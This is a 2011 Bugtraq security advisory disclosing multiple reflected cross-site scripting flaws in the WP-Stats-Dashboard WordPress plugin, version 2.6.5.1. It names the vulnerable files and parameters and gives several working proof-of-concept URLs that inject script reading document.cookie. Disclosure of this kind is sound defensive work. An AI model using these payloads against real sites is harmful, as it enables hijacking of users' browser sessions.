[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple XSS in WP-Stats-Dashboard
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple XSS in WP-Stats-Dashboard
- From: advisory@xxxxxxxxxxx
- Date: Wed, 17 Aug 2011 15:28:32 +0200 (CEST)
Vulnerability ID: HTB23035
Reference:
http://www.htbridge.ch/advisory/multiple_xss_in_wp_stats_dashboard.html
Product: WP-Stats-Dashboard
Vendor: Dave Ligthart ( http://www.daveligthart.com )
Vulnerable Version: 2.6.5.1 and probably prior
Tested on: 2.6.5.1
Vendor Notification: 27 July 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab (
http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple
vulnerabilities in WP-Stats-Dashboard, which can be exploited to perform
cross-site scripting attacks.
1) Input passed via the "icon", "url", "name", "type", "code", "username" GET
parameters to
/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php is not
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?icon=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?url=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?type=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/admin_profile_type.php?code=200&username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of the vulnerabilities requires that "register_globals"
is enabled.
2) Input passed via the "onchange" GET parameter to
/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php is
not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/select-trend.php?onchange=%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of the vulnerabilities requires that "register_globals"
is enabled.
3) Input passed via the "submenu" GET parameter to
/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php is not
properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of affected website.
The following PoC code is available:
http://[host]/wp-content/plugins/wp-stats-dashboard/view/admin/blocks/submenu.php?submenu[%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]
Successful exploitation of the vulnerabilities requires that "register_globals"
is enabled.